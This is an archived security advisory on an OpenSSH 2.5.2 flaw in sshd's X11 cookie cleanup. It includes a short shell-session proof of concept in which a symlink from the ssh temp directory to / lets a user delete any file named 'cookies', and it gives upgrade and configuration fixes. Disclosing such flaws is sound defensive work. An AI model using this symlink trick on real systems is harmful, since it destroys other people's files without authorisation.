TUCoPS :: Unix :: General :: openssl1.htm

TUCoPS :: Unix :: General :: openssl1.htm
OpenSSH delete cookies
COMMAND
 OpenSSH
SYSTEMS AFFECTED
 OpenSSH
PROBLEM
 'zen-parse' found following. You can delete any file on the
 filesystem you want... as long as its called cookies. Not really
 a very useful bug, but could cause annoyances to people who
 actually like their cookies.
 Sample exploit:
 [root@clarity /root]# touch /cookies;ls /cookies
 /cookies
 [root@clarity /root]# ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun 4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 [zen@clarity zen]$ logout
 Connection to localhost closed.
 [root@clarity /root]# ls /cookies
 /bin/ls: /cookies: No such file or directory
 Tested on Red Hat Linux release 7.0 (Guinness):
 [zen-parse@clarity zen-parse]$ rpm -qf /usr/sbin/sshd
 openssh-server-2.5.2p2-1.7.2
 [zen-parse@clarity zen-parse]$ ssh -V
 OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090581f
 The configuration file has not been modified from the default
 settings. Although sshd does drop root privileges, the processes
 groups are not cleared. (From /proc/$$/status of the sshd handling
 the session, and the output of strace and ltrace. (no use of
 initgroups in the ltrace output of the process that creates the
 directory, although it does do change euid before hand. there no
 setgroups in the strace output.)
 The file itself is created with O_EXCL so a symlink in place of
 the file cannot be used to create/overwrite arbitrary files.
 This vulnerability works fine on both RedHat 7.1 & 7.0 with the
 latest updated packages from RedHat installed.
 Jerry Connolly tested it on OpenSSH_2.5.2 on OpenBSD and it
 worked. He had to enable X forwarding on the client and server
 before the remote machine would create (and attempt to unlink() )
 the cookies file. The offending code is in session.c in the
 xauthfile_cleanup_proc() function
 <SNIP>
 /*
 * Remove local Xauthority file.
 */
 void
 xauthfile_cleanup_proc(void *ignore)
 {
 debug("xauthfile_cleanup_proc called");
 if (xauthfile != NULL) {
 char *p;
 unlink(xauthfile);
 </SNIP>
 where xauthfile points to a buffer containing the name of the
 cookies file.
SOLUTION
 Fixed in openssh's cvs (see www.openssh.com).
 For NetBSD if you cannot upgrade the sshd(8) binary, make sure
 you have "X11Forwarding no" in your system-wide sshd configuration
 file. The configuration file is located at /etc/sshd_config (for
 pkgsrc) or /etc/sshd.conf (in-tree sshd). If you are using
 openssh from pkgsrc, upgrade it to openssh-2.9p2 or higher. Make
 sure you have removed older sshd(8) binaries. If you are using
 ssh from pkgsrc (security/ssh, ssh.com implementation), migrate
 to openssh from pkgsrc (security/openssh). If you are using
 in-tree sshd (/usr/sbin/sshd), you may want to install openssh
 pkgsrc (2.9p2 or later) and use /usr/pkg/sbin/sshd instead of
 /usr/sbin/sshd.